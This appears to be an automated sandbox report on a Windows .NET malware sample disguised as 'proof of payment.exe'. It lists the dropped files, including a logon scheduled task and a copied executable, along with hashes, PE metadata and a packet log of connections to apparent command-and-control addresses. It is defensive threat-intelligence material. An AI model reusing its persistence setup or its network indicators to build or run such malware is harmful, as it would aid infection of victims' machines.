                                    Entropy (8bit):5.08843411652121
                                    Encrypted:false
                                    SSDEEP:48:cge2oHr8YrFdOFzOzN33ODOiDdKrsuTewLv:HeLwYrFdOFzOz6dKrsuq2
                                    MD5:DA2728ED3578E03A7B01831B0FEEE30D
                                    SHA1:D037D81CD9CB7EEA089B1ABAEA9FA45EBECF0ACD
                                    SHA-256:10B5B0FB86E77C0EF27565A750B6D7931599F18C2D5E7700EE81D75E92ED47F0
                                    SHA-512:479D08B7F062092B194FD9F50367DFB530136736DA9111DBCA663F23E5D1AEF1F64700CEE450C0E270186D9EA6D31309D1B6074C344D3F1BC70C815174F02958
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f

                                    C:\Users\user\AppData\Local\Temp\uevjjogtpiaq

                                    Download File
                                    Process:C:\Users\user\Desktop\proof of payment.exe
                                    File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                    Category:dropped
                                    Size (bytes):2
                                    Entropy (8bit):1.0
                                    Encrypted:false
                                    SSDEEP:3:Qn:Qn
                                    MD5:F3B25701FE362EC84616A93A45CE9998
                                    SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                    SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                    SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                    Malicious:false
                                    Preview:..

                                    C:\Users\user\AppData\Roaming\NvbYSEq.exe

                                    Download File
                                    Process:C:\Users\user\Desktop\proof of payment.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):927744
                                    Entropy (8bit):7.981237466402019
                                    Encrypted:false
                                    SSDEEP:12288:ppB778QH0fay4iJDieHNq5lVnsUc/Nb2JF5xXwGp94GEXHMY1E7LgHPPkqM7E6:bBWkithtq5jsT/9mb9PUsv7LMPZM7E6
                                    MD5:931254205CD64AD16B18FC9B318E2CA6
                                    SHA1:4E5C18FCBF06212D952E084B1B455ECC136E4845
                                    SHA-256:05A341A2577C728E8A994775B17B8C5562539146D78A5DE948E3534E1AE1C629
                                    SHA-512:D6464E122E6EB02D0D32DEC6866555BCFE1B644382EDA79B6242F93B39DF70071A9EB92C66817E2C1CF2D0B7A7BDF09C12B52E21471E56B2BF4AC7C3745332D9
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 61%
                                    • Antivirus: Virustotal, Detection: 56%, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....//f..............0..............2... ...@....@.. ....................................@..................................2..O....@..@....................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc...@....@......................@..@.reloc.......`.......$..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Roaming\NvbYSEq.exe:Zone.Identifier

                                    Download File
                                    Process:C:\Users\user\Desktop\proof of payment.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:false
                                    Preview:[ZoneTransfer]....ZoneId=0

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Entropy (8bit):7.981237466402019
                                    TrID:
                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                    • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                    File name:proof of payment.exe
                                    File size:927'744 bytes
                                    MD5:931254205cd64ad16b18fc9b318e2ca6
                                    SHA1:4e5c18fcbf06212d952e084b1b455ecc136e4845
                                    SHA256:05a341a2577c728e8a994775b17b8c5562539146d78a5de948e3534e1ae1c629
                                    SHA512:d6464e122e6eb02d0d32dec6866555bcfe1b644382eda79b6242f93b39df70071a9eb92c66817e2c1cf2d0b7a7bdf09c12b52e21471e56b2bf4ac7c3745332d9
                                    SSDEEP:12288:ppB778QH0fay4iJDieHNq5lVnsUc/Nb2JF5xXwGp94GEXHMY1E7LgHPPkqM7E6:bBWkithtq5jsT/9mb9PUsv7LMPZM7E6
                                    TLSH:1B1523809058BBF1E57E4F762A6F0D9D4BA930191A41E3DE88A371DCCD927125F6332D
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....//f..............0..............2... ...@....@.. ....................................@................................

                                    File Icon

                                    Icon Hash:0888742406740004

                                    Static PE Info

                                    General

                                    Entrypoint:0x4e32fe
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x662F2FC6 [Mon Apr 29 05:27:34 2024 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                    Entrypoint Preview

                                    Instruction
                                    jmp dword ptr [00402000h]
                                    inc ebx
                                    aaa
                                    xor eax, 52384335h
                                    pop edx
                                    dec eax
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [edx+39h], cl
                                    inc ebp
                                    pop edx
                                    dec eax
                                    xor eax, 34383234h
                                    xor al, 35h
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xe32ac0x4f.text
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xe40000x940.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xe60000xc.reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x20000xe13240xe1400625753356e847ffa09b8eee80d37a380False0.9814095449500555data7.988023924339669IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rsrc0xe40000x9400xc009c0ca3371346327245169ffd5a590deaFalse0.4339192708333333data4.3919687192927785IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc0xe60000xc0x400e1ab53fd273aeb9ec85d799c1175b545False0.0234375data0.04468700625387198IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                    Resources

                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    RT_ICON0xe40c80x51dPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.679144385026738
                                    RT_GROUP_ICON0xe45f80x14data1.05
                                    RT_VERSION0xe461c0x320data0.4525

                                    Imports

                                    DLLImport
                                    mscoree.dll_CorExeMain

                                    Network Behavior

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    May 3, 2024 13:13:19.155654907 CEST497082269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:20.108767033 CEST22694970837.120.235.122192.168.2.9
                                    May 3, 2024 13:13:20.108860970 CEST497082269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:20.115616083 CEST497082269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:20.952080011 CEST22694970837.120.235.122192.168.2.9
                                    May 3, 2024 13:13:21.006019115 CEST497082269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:21.965723991 CEST22694970837.120.235.122192.168.2.9
                                    May 3, 2024 13:13:22.146572113 CEST497082269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:22.394377947 CEST497082269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:23.299460888 CEST22694970837.120.235.122192.168.2.9
                                    May 3, 2024 13:13:23.299518108 CEST497082269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:24.173415899 CEST22694970837.120.235.122192.168.2.9
                                    May 3, 2024 13:13:24.266639948 CEST22694970837.120.235.122192.168.2.9
                                    May 3, 2024 13:13:24.271979094 CEST497082269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:25.293363094 CEST22694970837.120.235.122192.168.2.9
                                    May 3, 2024 13:13:25.295919895 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:25.297943115 CEST497132269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:25.317323923 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:25.334069014 CEST497082269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:26.119453907 CEST4971580192.168.2.9178.237.33.50
                                    May 3, 2024 13:13:26.285419941 CEST8049715178.237.33.50192.168.2.9
                                    May 3, 2024 13:13:26.285545111 CEST4971580192.168.2.9178.237.33.50
                                    May 3, 2024 13:13:26.285801888 CEST4971580192.168.2.9178.237.33.50
                                    May 3, 2024 13:13:26.302885056 CEST497132269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:26.302921057 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:26.318502903 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:26.367510080 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:26.367533922 CEST22694971337.120.235.122192.168.2.9
                                    May 3, 2024 13:13:26.367583036 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:26.367659092 CEST497132269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:26.367683887 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:26.367760897 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:26.371629953 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:26.373712063 CEST497132269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:26.375463963 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:26.457278967 CEST8049715178.237.33.50192.168.2.9
                                    May 3, 2024 13:13:26.457345009 CEST4971580192.168.2.9178.237.33.50
                                    May 3, 2024 13:13:26.485361099 CEST497082269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:27.364464045 CEST22694971337.120.235.122192.168.2.9
                                    May 3, 2024 13:13:27.364535093 CEST497132269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:27.372416973 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:27.372436047 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:27.372504950 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:27.372667074 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:27.466854095 CEST8049715178.237.33.50192.168.2.9
                                    May 3, 2024 13:13:27.466948032 CEST4971580192.168.2.9178.237.33.50
                                    May 3, 2024 13:13:27.695055962 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:27.695080996 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:27.695096016 CEST22694971337.120.235.122192.168.2.9
                                    May 3, 2024 13:13:27.740385056 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:27.740386009 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:27.740607977 CEST497132269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:28.052865982 CEST497082269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:28.881650925 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:28.882606983 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:28.883423090 CEST22694971337.120.235.122192.168.2.9
                                    May 3, 2024 13:13:28.886142969 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:28.887096882 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:28.892221928 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:28.895014048 CEST497132269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:28.899012089 CEST497132269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:29.220452070 CEST22694970837.120.235.122192.168.2.9
                                    May 3, 2024 13:13:30.254632950 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:30.254659891 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:30.254771948 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:30.293034077 CEST22694971337.120.235.122192.168.2.9
                                    May 3, 2024 13:13:30.293251038 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:30.293311119 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:30.293322086 CEST22694971337.120.235.122192.168.2.9
                                    May 3, 2024 13:13:30.293375969 CEST497132269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:31.223557949 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:31.223694086 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:31.244709015 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:31.244834900 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:31.292321920 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:31.292474985 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:31.318264961 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:31.319837093 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:31.319916010 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:31.322619915 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:31.325665951 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:31.325711966 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:33.753019094 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:33.753035069 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:33.753098965 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:33.753138065 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:33.753138065 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:33.755951881 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:33.760871887 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:33.776591063 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:33.777543068 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:33.782079935 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:33.782094955 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:33.782154083 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:33.785209894 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:33.785264969 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:34.087831974 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:34.089206934 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:34.089277029 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:34.089277029 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:34.095550060 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:34.095567942 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:34.095628977 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:34.095657110 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:34.104512930 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:34.108592987 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:34.108654976 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:34.111700058 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:34.122750998 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:34.122863054 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:34.123023033 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:34.123111963 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:34.123158932 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:34.124897003 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:34.125756025 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:34.125819921 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:34.127856016 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:34.129616976 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:34.129667044 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:34.131620884 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:34.133733034 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:34.133805990 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:34.749852896 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:34.749876976 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:34.749952078 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:34.749991894 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:34.749993086 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:34.757194996 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:34.757260084 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:34.757348061 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:34.757395029 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:34.767230988 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:34.767275095 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:34.798962116 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:34.800756931 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:34.800802946 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:34.804766893 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:34.807629108 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:34.807672977 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:34.810456991 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:34.813493967 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:34.813544035 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:34.818759918 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:34.819701910 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:34.819741011 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:34.821352959 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:34.823710918 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:34.823750973 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:34.825653076 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:34.826594114 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:34.826633930 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:34.828541040 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:34.829435110 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:34.829489946 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:34.832665920 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:34.838850021 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:34.838891029 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:34.840503931 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:34.841635942 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:34.841680050 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:34.845781088 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:34.847659111 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:34.847702980 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:34.848485947 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:34.849654913 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:34.849695921 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:34.851459980 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:34.854656935 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:34.854701996 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:36.063458920 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.063585043 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:36.087341070 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.087371111 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.087380886 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.087450027 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:36.087450027 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:36.087491035 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:36.150016069 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.150089979 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:36.181829929 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.188807011 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.188889027 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:36.190850973 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.192580938 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.192631960 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:36.193766117 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.195595026 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.195647955 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:36.197668076 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.199816942 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.199867010 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:36.201909065 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.206943035 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.207019091 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:36.209820032 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.209954023 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.210016966 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:36.214730024 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.217143059 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.217215061 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:36.220021963 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.223978043 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.224051952 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:36.225641012 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.228579044 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.228657007 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:36.230835915 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.231559038 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.231648922 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:36.233676910 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:36.241386890 CEST22694971237.120.235.122192.168.2.9
